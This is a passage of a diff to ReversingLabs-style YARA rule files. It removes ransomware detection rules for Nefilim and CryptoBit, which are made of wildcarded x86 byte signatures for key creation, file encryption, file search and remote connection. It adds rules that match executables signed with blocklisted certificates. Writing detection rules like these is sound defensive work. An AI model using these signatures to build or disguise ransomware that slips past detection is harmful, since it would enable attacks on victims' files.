+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14748-L14764"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "fae0350e51aee2777475d2222848b30fd39fa39ceea260132b0c7fbc536b3a86"
+		logic_hash = "54921ce39a0876511b33ac6fa088c3342e2ea7fa037423fe72825bfe9c83bce6"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Nefilim"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$create_encryption_key = {
-            55 8B EC 51 A1 ?? ?? ?? ?? C1 E8 ?? 6B C0 ?? 56 50 E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ??
-            ?? 8B F0 A1 ?? ?? ?? ?? 59 89 75 ?? 73 ?? B8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 50 E8 ??
-            ?? ?? ?? 33 F6 59 59 39 35 ?? ?? ?? ?? 75 ?? 53 57 8B 3D ?? ?? ?? ?? 56 6A ?? 56 BE
-            ?? ?? ?? ?? 56 BB ?? ?? ?? ?? 53 FF D7 85 C0 75 ?? 6A ?? 6A ?? 50 56 53 FF D7 85 C0
-            75 ?? 50 FF 15 ?? ?? ?? ?? 5F 33 F6 5B A1 ?? ?? ?? ?? C1 E8 ?? 6B C0 ?? 68 ?? ?? ??
-            ?? 56 56 50 FF 75 ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 56 EB ?? 5E C9
-            C3
-        }
-		$encrypt_encryption_key = {
-            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 68 ?? ?? ?? ?? 8D 45 ?? 8D 4D ?? E8
-            ?? ?? ?? ?? 83 78 ?? ?? 59 72 ?? 8B 00 53 56 57 33 DB 53 53 6A ?? 53 53 68 ?? ?? ??
-            ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 33 FF 8D 75 ?? 89 45 ?? E8 ?? ?? ?? ?? 39 5D ?? 0F 84
-            ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? BF ?? ?? ?? ?? 57 FF D3 99 83 E2 ?? 03 C2 C1 F8 ?? 6B
-            C0 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 57 8B F0 FF D3 50 57 E8 ?? ??
-            ?? ?? 59 59 57 FF D3 99 83 E2 ?? 03 C2 C1 F8 ?? 6B C0 ?? 89 45 ?? 8D 45 ?? 50 56 6A
-            ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 85 C0 75 ?? FF 15 ?? ?? ??
-            ?? 8D 45 ?? 50 57 FF D3 99 83 E2 ?? 03 C2 C1 F8 ?? 6B C0 ?? 50 56 FF 75 ?? FF 15 ??
-            ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
-            6A ?? 33 FF 8D 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 83 E4 ?? 83 EC ?? A1 ?? ?? ?? ?? 33 C4 89 44 24 ?? 83 7D ?? ?? 8B 45 ?? 53
-            56 57 73 ?? 8D 45 ?? 33 DB 53 53 6A ?? 53 53 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89
-            44 24 ?? 3B C3 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? 51 50 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ??
-            6B C0 ?? 83 C0 ?? 83 F8 ?? 0F 8E ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 6A ?? 89 44 24 ??
-            E8 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? BE
-            ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 56 89 44 24 ?? E8 ?? ?? ?? ?? FF 74 24 ?? 8B 54 24 ??
-            89 44 24 ?? E8 ?? ?? ?? ?? FF 74 24 ?? 8B 54 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? FF 15 ??
-            ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 7E ?? 68 ?? ?? ?? ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 6A ??
-            33 FF E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 53 53 FF 74 24 ?? FF 74 24 ??
-            FF 74 24 ?? FF D7 53 FF 15 ?? ?? ?? ?? 53 8D 44 24 ?? 50 56 FF 74 24 ?? FF 74 24 ??
-            FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83
-            F8 ?? 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 53 03 C6 53 13 CB 51 50 FF 74 24 ??
-            FF D7 53 8D 44 24 ?? 50 56 FF 74 24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B 44 24 ?? 8B
-        }
-		$encrypt_files_p2 = {
-            4C 24 ?? 53 05 ?? ?? ?? ?? 53 13 CB 51 50 FF 74 24 ?? FF D7 53 E8 ?? ?? ?? ?? 0B C2
-            59 74 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 6A ?? 33 FF 8D 74 24 ?? E8 ?? ??
-            ?? ?? 8B 3D ?? ?? ?? ?? 53 8D 44 24 ?? 50 FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 74
-            24 ?? FF 15 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 3B C3 0F 8C ?? ?? ?? ?? 7F ?? 81 F9
-            ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 89 5C 24 ?? 89 5C 24 ?? 3B C3 0F 8C ?? ?? ?? ?? 7F ??
-            3B CB 0F 86 ?? ?? ?? ?? BE ?? ?? ?? ?? EB ?? 8B 4C 24 ?? 2B 4C 24 ?? 1B 44 24 ?? 89
-            44 24 ?? 0F 88 ?? ?? ?? ?? 7F ?? 81 F9 ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 56 53 FF 15 ??
-            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 53 53 FF 74 24 ?? 89 44 24 ?? FF 74 24 ?? FF 74 24 ??
-            FF D7 53 8D 44 24 ?? 50 56 FF 74 24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 8B
-            54 24 ?? 51 56 FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 FF 74 24 ?? FF 74 24 ?? FF
-            74 24 ?? FF D7 53 8D 44 24 ?? 50 56 FF 74 24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? FF 74 24 ?? 53 50 FF 15 ?? ?? ?? ?? 81 44 24 ?? ?? ?? ?? ?? 8B 44 24 ??
-            11 5C 24 ?? 39 44 24 ?? 0F 8C ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? 8B 4C 24 ?? 39 4C 24 ??
-            0F 82 ?? ?? ?? ?? E9 ?? ?? ?? ?? 3B C3 0F 8C ?? ?? ?? ?? 7F ?? 81 F9 ?? ?? ?? ?? 0F
-        }
-		$encrypt_files_p3 = {
-            86 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 74 24 ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 56 E8 ?? ??
-            ?? ?? 59 89 44 24 ?? FF 15 ?? ?? ?? ?? 53 53 33 C9 51 33 C0 50 FF 74 24 ?? FF D7 53
-            8D 44 24 ?? 50 56 FF 74 24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 8B 54 24 ??
-            51 56 FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 33 C0 50 50 FF 74 24 ?? FF D7 53 8D
-            44 24 ?? 50 56 FF 74 24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ??
-            59 E9 ?? ?? ?? ?? 51 53 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? FF 15 ??
-            ?? ?? ?? 53 53 33 C0 50 53 FF 74 24 ?? FF D7 53 8D 44 24 ?? 50 FF 74 24 ?? FF 74 24
-            ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 8B 4C 24
-            ?? 8B 54 24 ?? 51 FF 74 24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 33 C0 50 53
-            FF 74 24 ?? FF D7 53 8D 44 24 ?? 50 FF 74 24 ?? FF 74 24 ?? FF 74 24 ?? FF 15 ?? ??
-            ?? ?? FF 74 24 ?? 53 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 33 FF 8D 74 24 ??
-            E8 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? FF 74 24 ??
-            E8 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            8D 45 ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 78 ?? ?? 72 ?? 8B 00 83 7D ?? ?? 8B
-            4D ?? 73 ?? 8D 4D ?? 50 51 FF 15 ?? ?? ?? ?? 6A ?? 33 FF 8D 74 24 ?? E8 ?? ?? ?? ??
-            6A ?? 33 FF 8D 75 ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5
-            5D C3
-        }
-		$find_files_1 = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 56
-            57 6A ?? 5E 33 C0 33 FF 6A ?? 66 89 44 24 ?? 57 8D 45 ?? 8D 4C 24 ?? 89 74 24 ?? 89
-            7C 24 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 66
-            89 44 24 ?? 66 89 44 24 ?? 8B 84 24 ?? ?? ?? ?? 03 44 24 ?? 8D 4C 24 ?? 89 74 24 ??
-            89 7C 24 ?? 89 74 24 ?? 89 7C 24 ?? E8 ?? ?? ?? ?? 57 8D 44 24 ?? 50 83 C8 ?? 8D 74
-            24 ?? E8 ?? ?? ?? ?? 57 8D 84 24 ?? ?? ?? ?? 50 83 C8 ?? E8 ?? ?? ?? ?? 8B DE 8D 44
-            24 ?? E8 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 8B 44 24 ?? 73 ?? 8D 44 24
-            ?? 8D 8C 24 ?? ?? ?? ?? 51 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ??
-            ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24
-        }
-		$find_files_2 = {
-            D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? F6
-            84 24 ?? ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 4C 24 ?? 8D 44 24 ?? 74 ?? E8 ?? ??
-            ?? ?? 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 59 8B D8 59 8D 44 24 ?? E8 ?? ?? ?? ?? 6A ?? 33
-            FF 8D 74 24 ?? E8 ?? ?? ?? ?? 6A ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 83 EC ?? 8B CC 21 79
-            ?? 33 C0 6A ?? C7 41 ?? ?? ?? ?? ?? 66 89 01 50 8D 44 24 ?? E8 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 59 8D 44 24 ?? E8 ?? ?? ?? ?? 6A
-            ?? 33 FF 8D 74 24 ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 50 8D
-            44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 6A ?? 5F 39 7C 24 ?? 73 ?? 8D 44 24 ?? 8B 35 ??
-            ?? ?? ?? 68
-        }
-		$find_files_3 = {
-            50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 39 7C 24 ?? 73 ?? 8D 44 24 ?? 68 ?? ??
-            ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 39 7C 24 ?? 73 ?? 8D 44 24 ?? 68
-            ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 39 7C 24 ?? 73 ?? 8D 44 24
-            ?? 68 ?? ?? ?? ?? 50 FF D6 85 C0 74 ?? 8B 44 24 ?? 39 7C 24 ?? 73 ?? 8D 44 24 ?? 68
-            ?? ?? ?? ?? 50 FF D6 85 C0 74 ?? 8B 44 24 ?? 39 7C 24 ?? 73 ?? 8D 44 24 ?? 68 ?? ??
-            ?? ?? 50 FF D6 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 74 ??
-            8B 4C 24 ?? 39 7C 24 ?? 73 ?? 8D 4C 24 ?? 83 EC ?? 8B C4 51 E8 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 83 C4 ?? 6A ?? 33 FF 8D 74 24 ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 74
-            24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 33 DB
-            43 53 33 FF 8D 74 24 ?? E8 ?? ?? ?? ?? 53 8D B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 8D
-            74 24 ?? E8 ?? ?? ?? ?? 53 8D 75 ?? E8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E 5B 33
-            CC E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "77:d5:c1:a3:e6:23:57:59:99:c7:44:09:dc:19:75:3c" and 1475884800 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_E9756B3F38B1172Ea89Fdbdfdba5F979 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "77d7470c-0c60-5ef4-b1d9-35642c147afe"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14766-L14784"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "997a9433f907896d82f22ae323bf9cfe9aa04a2a49c5505e98adbb34277fcc15"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_* ) ) and ( $create_encryption_key ) and ( $encrypt_encryption_key ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kreamer Ltd" and ( pe.signatures [ i ] . serial == "00:e9:75:6b:3f:38:b1:17:2e:a8:9f:db:df:db:a5:f9:79" or pe.signatures [ i ] . serial == "e9:75:6b:3f:38:b1:17:2e:a8:9f:db:df:db:a5:f9:79" ) and 1492732800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Cryptobit : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_09Fb28 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects CryptoBit ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8566e516-9884-5b20-90c4-7ed38fa96999"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "e7701457-c6cd-5b20-b227-8a9cdcde8213"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.CryptoBit.yara#L1-L113"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14786-L14802"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ccc8a0f1c5e11211649992d0f2b309968c97b49f1c7359e62d622f364e117429"
+		logic_hash = "5ed65d33b73977e869460ba51271aff94811fa2f41e4a2993c47233add2f38dd"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "CryptoBit"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            55 8B EC 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83
-            7D ?? ?? 75 ?? FF 75 ?? EB ?? 6A ?? 59 83 C9 ?? 83 F1 ?? 89 4D ?? 6A ?? 6A ?? 6A ??
-            6A ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 0B C0 0F 84 ?? ?? ?? ?? 89 45 ?? 60 BE ?? ?? ??
-            ?? 56 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 33 D2
-            8B 0D ?? ?? ?? ?? F7 F1 0B C0 74 ?? FF 35 ?? ?? ?? ?? EB ?? 52 8B 0C 24 29 4D ?? 51
-            FF 75 ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 0B C0 74 ?? 89 45 ?? 51 FF
-            75 ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? 83 7D ?? ?? 75 ?? 89 45 ?? 89 4D ?? FF 75 ??
-            E8 ?? ?? ?? ?? EB ?? EB ?? 83 7D ?? ?? 75 ?? C7 45 ?? ?? ?? ?? ?? EB ?? A1 ?? ?? ??
-            ?? 01 45 ?? EB ?? EB ?? 8B 64 24 ?? 64 8F 05 ?? ?? ?? ?? 83 C4 ?? 61 EB ?? EB ?? 64
-            8F 05 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 8B 4D
-            ?? EB ?? 8B 45 ?? C9 C2
-        }
-		$encrypt_files_p2 = {
-            55 8B EC 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A
-            ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 84 ??
-            ?? ?? ?? 89 45 ?? 8D 45 ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? E8 ?? ?? ?? ??
-            0B C0 74 ?? E9 ?? ?? ?? ?? 89 45 ?? 8B 15 ?? ?? ?? ?? 8B 4D ?? 0B C9 75 ?? 83 F8 ??
-            73 ?? E9 ?? ?? ?? ?? EB ?? 0B C9 75 ?? 3B C2 73 ?? 50 EB ?? 52 8F 45 ?? 83 7D ?? ??
-            75 ?? A1 ?? ?? ?? ?? 39 45 ?? 72 ?? FF 75 ?? FF 75 ?? FF 75 ?? FF 75 ?? E8 ?? ?? ??
-            ?? 89 45 ?? 0B C0 74 ?? 6A ?? 50 51 FF 75 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 6A
-            ?? 6A ?? 6A ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 0B C0 74 ?? 89 45 ?? 60 BE ?? ?? ?? ??
-            56 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? FF 75 ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF
-            75 ?? E8 ?? ?? ?? ?? 0B C0 74 ?? 50 8B 4D ?? 8B 04 24 83 C9 ?? 83 F1 ?? 51 50 E8 ??
-            ?? ?? ?? 89 45 ?? 0B C0 74 ?? 6A ?? 50 51 FF 75 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB
-            ?? 8B 64 24 ?? 64 8F 05 ?? ?? ?? ?? 83 C4 ?? 61 EB ?? EB ?? 64 8F 05 ?? ?? ?? ?? 83
-            C4 ?? 83 7D ?? ?? 74 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? E8 ?? ??
-            ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 8B 4D ?? EB ?? 33 C0 33 C9 C9 C2
-        }
-		$find_files_p1 = {
-            55 8B EC 83 C4 ?? 57 56 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 8B 75 ?? 83 7E ?? ?? 75 ?? E8 ?? ?? ?? ?? 50 8D 46 ?? 50 E8
-            ?? ?? ?? ?? 23 C0 0F 84 ?? ?? ?? ?? EB ?? 83 7E ?? ?? 75 ?? FF 35 ?? ?? ?? ?? 8D 46
-            ?? 50 E8 ?? ?? ?? ?? 23 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 23 C0 0F
-            84 ?? ?? ?? ?? 89 45 ?? B9 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 23 C0 0F 84 ??
-            ?? ?? ?? 89 45 ?? 8B 75 ?? 8B 7D ?? 68 ?? ?? ?? ?? 57 56 E8 ?? ?? ?? ?? 8D 57 ?? 8B
-            47 ?? D1 E0 C7 04 10 ?? ?? ?? ?? C6 44 10 ?? ?? FF 75 ?? 8D 47 ?? 50 E8 ?? ?? ?? ??
-            83 F8 ?? 0F 84 ?? ?? ?? ?? 89 45 ?? 8B 55 ?? 8B 75 ?? 8B 7D ?? 8B 02 25 ?? ?? ?? ??
-            0F 85 ?? ?? ?? ?? 8B 02 83 E0 ?? 0F 85 ?? ?? ?? ?? 8B 02 83 E0 ?? F7 02 ?? ?? ?? ??
-            0F 85 ?? ?? ?? ?? 8D 47 ?? 50 8D 46 ?? 50 E8 ?? ?? ?? ?? 8B 55 ?? 8D 42 ?? 50 8D 47
-            ?? 50 E8 ?? ?? ?? ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? 8B 55 ?? 89 47 ?? F7 02 ?? ?? ?? ??
-            74 ?? 68 ?? ?? ?? ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? FF 77 ?? 8D 47 ?? 50 E8 ?? ?? ?? ??
-            83 F8 ?? 74 ?? 83 F8 ?? 75 ?? 48 50 FF 76 ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? 0B C0 75
-        }
-		$find_files_p2 = {
-            0B C9 74 ?? FF 45 ?? E9 ?? ?? ?? ?? 83 7A ?? ?? 0F 84 ?? ?? ?? ?? 81 7A ?? ?? ?? ??
-            ?? 0F 84 ?? ?? ?? ?? F7 02 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? F7 02 ?? ?? ?? ?? 0F 85 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 74 ?? 8B F8 FF 76 ?? 8F 47 ?? FF 76 ??
-            8F 47 ?? FF 36 8F 07 8D 47 ?? 50 8D 46 ?? 50 E8 ?? ?? ?? ?? 8B 55 ?? 8D 42 ?? 50 8D
-            47 ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? 8D 47 ?? 50 E8 ??
-            ?? ?? ?? 89 47 ?? 83 3F ?? 75 ?? 57 68 ?? ?? ?? ?? FF 76 ?? E8 ?? ?? ?? ?? 0B C0 75
-            ?? 57 E8 ?? ?? ?? ?? EB ?? 57 E8 ?? ?? ?? ?? EB ?? E9 ?? ?? ?? ?? FF 75 ?? FF 75 ??
-            E8 ?? ?? ?? ?? 0B C0 0F 85 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
-            8B 75 ?? 83 7D ?? ?? 74 ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B
-            14 24 51 50 52 8D 46 ?? 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 D1 E1 8B 5C 24 ?? 51 50 53 8D 46
-            ?? 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? E8 ??
-            ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? E8 ??
-            ?? ?? ?? 8B 45 ?? 5E 5F C9 C2
-        }
-		$remote_connection = {
-            55 8B EC 81 C4 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ??
-            6A ?? E8 ?? ?? ?? ?? 23 C0 89 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A
-            ?? 6A ?? 6A ?? FF 75 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 89 85 ?? ?? ?? ?? 0F
-            84 ?? ?? ?? ?? 8D 5D ?? C7 03 ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ??
-            ?? ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 45 ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 74 ?? 6A ?? 6A ?? 6A ?? 6A ?? FF B5 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 23 C0 74 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 23 C0 89 85 ?? ?? ?? ?? 74 ??
-            8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? FF B5 ?? ?? ?? ?? 0B C0 74 ?? 83 BD ?? ?? ?? ?? ?? 74 ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ??
-            FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? C9 C2
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "New Dial spa" and pe.signatures [ i ] . serial == "09:fb:28" and 1046968418 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_197Dc32D915458953562D2Fe78Bf2468 : INFO FILE
